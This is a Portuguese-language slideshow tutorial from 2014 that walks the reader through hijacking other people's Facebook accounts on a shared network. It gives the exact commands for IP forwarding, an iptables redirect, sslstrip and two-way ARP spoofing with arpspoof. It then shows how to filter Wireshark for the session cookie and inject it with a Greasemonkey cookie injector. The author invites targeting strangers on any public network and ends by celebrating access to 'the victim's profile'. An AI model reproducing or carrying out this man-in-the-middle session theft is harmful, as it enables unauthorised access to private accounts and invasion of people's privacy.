Black-Halt36
Hackeando Facebook com Wireshark e Cookie Injector
« Online: 24 de Abril de 2014, 22:32 »
Primeiramente você ...
echo 1 > /proc/sys/net/ipv4/ip_forwarding
O próximo passo é criar uma regra no iptables para redirecionar todo o tráfego:
...
Agora sim vamos iniciar o ataque de verdade, inicie o sslstrip para ficar escutando o
tráfego:
sslstrp -a -l 8080
Agora precisamos do arp spoofing, para isso vamos usar duas vezes o comando
arpspoof. Mantenha sempre as 2 abas com os 2 c...
E por em quanto chega de terminal, vamos para a interface gráfica do wireshark. No
wireshark, inicie a captura de pacotes,...
Provavelmente você não receberá nada de início, mas assim que seu alvo acessar um
site como por exemplo o Facebook veja o ...
Provavelmente o último pacote GET é o que contém nosso cookie. Clique com o botão
direito nele vá em Copy > Bytes > Printa...
Agora só precisamos injetar isso na página do Facebook e termos acesso ao perfil do
alvo. Vá então para a página do Facebo...
Se você ver uma mensagem como esta é porque o cookie foi injetado com sucesso,
agora é só recarregar o Facebook e ver se f...
E ai está! Estamos no perfil da vítima!
Algumas considerações finais:Isto funciona não só no Facebook, praticamente todos os
sites geram cookies, então praticamen...
Hackeando facebook com wireshark e cookie injector
Próximos SlideShares
Carregando em…5
×

Hackeando facebook com wireshark e cookie injector

492 visualizações

Publicada em

Hackeando facebook com wireshark e cookie injector

Publicada em: Educação
0 comentários
0 gostaram
Estatísticas
Notas
  • Seja o primeiro a comentar

  • Seja a primeira pessoa a gostar disto

Sem downloads
Visualizações
Visualizações totais
492
No SlideShare
0
A partir de incorporações
0
Número de incorporações
4
Ações
Compartilhamentos
0
Downloads
11
Comentários
0
Gostaram
0
Incorporações 0
Nenhuma incorporação

Nenhuma nota no slide

Hackeando facebook com wireshark e cookie injector

  1. 1. Black-Halt36 Hackeando Facebook com Wireshark e Cookie Injector « Online: 24 de Abril de 2014, 22:32 » Primeiramente você vai precisar estar na mesma rede que seu alvo. Se você não tem um alvo específico, qualquer rede pública serve. Vamos precisar de: Uma distro Linux para facilitarWindows qualquer (não sei se foi o chrome ou se foi o mac mas não funcionou no mac) SSLStripWiresharkArpspoofGreasemonkeyCookie injector para GreasemonkeyFirefox ou Iceweasel Bastante coisa, não é um tuto muito fácil. Mas depois de um tempo de prática você vê que também não é tão difícil. Primeiramente baixe tudo o que você não tem. Se você usa Back Track ou Kali, falta apenas o Greasemonkey e o Cookie Injector, com algumas buscas no google você encontra… Vamos ao tuto então! Primeiro de tudo temos que ativar o encaminhamento dos pacotes. Para isso basta digitar o comando abaixo:
  2. 2. echo 1 > /proc/sys/net/ipv4/ip_forwarding O próximo passo é criar uma regra no iptables para redirecionar todo o tráfego: iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 8080
  3. 3. Agora sim vamos iniciar o ataque de verdade, inicie o sslstrip para ficar escutando o tráfego: sslstrp -a -l 8080
  4. 4. Agora precisamos do arp spoofing, para isso vamos usar duas vezes o comando arpspoof. Mantenha sempre as 2 abas com os 2 comandos rodando em quanto estiver capturando o tráfego: arpspoof -i eth0 -t ip_do_alvo ip_do_roteadorarpspoof -i eth0 -t ip_do_roteador ip_do_alvo
  5. 5. E por em quanto chega de terminal, vamos para a interface gráfica do wireshark. No wireshark, inicie a captura de pacotes, e para facilitar no filtro de pacotes coloque o seguinte filtro: http.cookie contains datr
  6. 6. Provavelmente você não receberá nada de início, mas assim que seu alvo acessar um site como por exemplo o Facebook veja o que acontece:
  7. 7. Provavelmente o último pacote GET é o que contém nosso cookie. Clique com o botão direito nele vá em Copy > Bytes > Printable Text Only:
  8. 8. Agora só precisamos injetar isso na página do Facebook e termos acesso ao perfil do alvo. Vá então para a página do Facebook e aperte ALT + C para abrir uma janelinha bem no meio da página. Nesta janelinha cole o que copiamos antes:
  9. 9. Se você ver uma mensagem como esta é porque o cookie foi injetado com sucesso, agora é só recarregar o Facebook e ver se funcionou:
  10. 10. E ai está! Estamos no perfil da vítima!
  11. 11. Algumas considerações finais:Isto funciona não só no Facebook, praticamente todos os sites geram cookies, então praticamente todos os sites (na verdade a culpa não é do site) estão vulneráveis a esse tipo de ataque.Se a pessoa estiver logando automaticamente porque ela marcou a caixa “Mantenha-me conectado” anteriormente pode ser que isso não funcione.

×